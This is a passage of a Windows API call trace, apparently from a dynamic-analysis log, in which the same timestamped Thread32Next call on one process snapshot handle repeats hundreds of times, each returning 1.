(hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.946] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0254.946] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.081] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.082] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.083] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.083] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.084] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.088] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.088] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.089] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.091] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.092] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.093] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.094] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.094] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.095] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.096] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.097] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.098] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.098] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.099] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.100] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.100] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.101] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.102] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.103] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.104] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.104] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.105] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.106] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.106] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.107] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.108] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.108] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.109] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.110] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.111] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.112] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.112] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.113] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.114] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.115] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.115] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.116] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.116] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.117] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.118] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.118] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.297] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.298] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.299] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.299] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.300] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.300] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.301] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.302] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.302] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.303] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.303] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.304] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.305] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.305] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.306] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.306] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.307] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.308] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.308] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.309] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.310] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.311] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.312] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.313] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.313] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.314] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.315] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.315] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.316] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.317] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.317] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.318] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.319] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.319] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.320] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.321] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.321] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.322] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.323] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.323] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.324] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.325] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.325] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.326] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.327] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.327] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.328] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.329] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.330] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.330] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.331] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.331] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.332] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.519] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.519] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.520] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.521] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.522] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.522] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.523] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.524] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.525] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.525] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.526] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.527] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.528] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.528] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.529] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.530] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.531] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.532] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.532] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.533] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.534] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.535] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.536] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.536] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.537] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.538] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.539] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.539] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.540] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.541] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.542] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.542] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.543] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.544] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.545] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.545] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.546] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.547] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.548] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.548] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.549] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.550] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.551] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.552] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.552] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.553] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.713] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.714] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.715] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.715] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.716] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.717] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.717] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.718] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.719] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.720] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.720] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.721] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.722] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.722] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.723] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.724] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.725] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.725] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.726] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.727] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.728] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.728] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.729] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.730] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.731] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.732] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.732] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.733] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.734] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.734] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.735] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.736] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.736] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.737] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.738] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.739] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.740] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.740] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.741] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.742] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.743] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.744] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.744] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.745] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.746] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.747] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.747] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.748] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.930] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.931] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.931] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.932] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.933] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.933] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.934] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.934] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.935] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.935] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.936] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.936] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.937] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.937] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.938] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.939] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.939] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.940] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.940] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.941] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.942] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.942] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.943] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.943] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.944] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.945] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.945] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.946] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.946] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.947] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.947] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.948] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.948] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.949] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.950] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.950] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.951] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.951] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.952] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.952] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.953] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.953] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.954] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.954] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.955] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.955] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.956] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.957] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.957] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.958] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.958] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.959] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.959] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.960] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.960] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.961] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.961] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.962] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.962] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.963] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0255.963] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.290] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.290] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.291] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.291] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.292] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.292] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.293] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.294] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.294] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.295] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.296] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.296] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.297] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.297] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.298] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.298] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.299] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.300] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.300] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.301] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.301] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.302] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.303] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.303] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.304] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.304] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.305] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.305] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.306] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.307] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.307] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.308] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.308] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.309] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.310] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.310] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.311] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.311] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.312] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.312] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.313] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.314] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.314] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.315] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.315] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.316] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.316] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.317] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.318] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.318] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.319] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.319] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.320] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.321] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.322] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.322] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.323] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.324] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.495] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.496] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.497] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.498] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.498] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.499] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.500] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.501] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.501] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.502] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.503] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.503] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.504] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.505] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.506] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.506] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.507] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.508] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.508] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.509] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.510] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.511] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.511] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.512] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.512] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.513] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.514] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.515] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.515] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.516] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.517] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.517] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.518] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.519] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.519] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.520] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.521] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.526] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.527] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.528] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.529] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.529] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.530] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.531] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.531] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.533] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.534] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.705] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.706] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.706] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0256.707] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 